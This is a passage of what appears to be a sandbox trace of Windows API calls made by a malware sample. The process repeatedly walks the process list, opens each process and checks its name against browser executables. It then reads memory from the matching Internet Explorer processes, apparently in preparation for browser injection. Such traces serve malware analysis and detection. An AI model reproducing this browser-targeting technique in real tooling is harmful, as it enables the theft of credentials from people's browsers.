	[0234.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.074] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.074] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x729c
	[0234.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.075] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0234.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.075] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.111] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0234.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.112] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x72a0
	[0234.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.113] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0234.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.114] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.115] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0234.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.116] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x72a4
	[0234.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.117] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0234.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.118] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.118] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0234.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.119] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x72a8
	[0234.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.120] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.120] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.121] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.121] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.121] NtQueryInformationProcess (in: ProcessHandle=0x72a8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.121] ReadProcessMemory (in: hProcess=0x72a8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.121] ReadProcessMemory (in: hProcess=0x72a8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.121] ReadProcessMemory (in: hProcess=0x72a8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.121] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x72ac
	[0234.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.123] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.124] NtQueryInformationProcess (in: ProcessHandle=0x72ac, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.124] ReadProcessMemory (in: hProcess=0x72ac, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.124] ReadProcessMemory (in: hProcess=0x72ac, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.124] ReadProcessMemory (in: hProcess=0x72ac, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.124] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x72b0
	[0234.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.125] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.126] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.126] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.126] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0234.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x72b4
	[0234.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.127] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0234.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.128] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.128] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0234.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.128] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.129] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x72b8
	[0234.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.129] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.130] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.130] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.130] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x72bc
	[0234.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.132] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.132] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.133] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.133] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x72c0
	[0234.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.134] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.135] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.135] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.135] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.135] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x72c4
	[0234.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.137] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.137] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.137] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0234.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x72c8
	[0234.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.138] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.139] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.139] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.139] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x72cc
	[0234.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.140] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.141] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.143] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.144] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.145] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x72d0
	[0234.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.145] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.145] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.146] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.146] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0234.147] CloseHandle (hObject=0x4fd0) returned 1
	[0234.147] Sleep (dwMilliseconds=0x64) 
	[0234.254] GetCurrentProcessId () returned 0x110
	[0234.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0234.256] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0234.257] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0234.258] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0234.259] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x72d4
	[0234.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.259] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.259] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.259] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.260] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.261] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x72d8
	[0234.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.261] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.261] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.261] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.262] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.262] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0234.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x72dc
	[0234.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.263] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0234.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.263] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.263] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0234.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.264] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.264] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0234.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x72e0
	[0234.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.265] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0234.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.265] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.265] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0234.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.266] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0234.267] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x72e4
	[0234.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.268] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0234.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.268] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.269] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0234.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.269] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0234.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x72e8
	[0234.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.270] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0234.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.271] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.271] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0234.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.271] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0234.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x72ec
	[0234.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.273] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0234.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.273] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.273] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0234.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.273] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
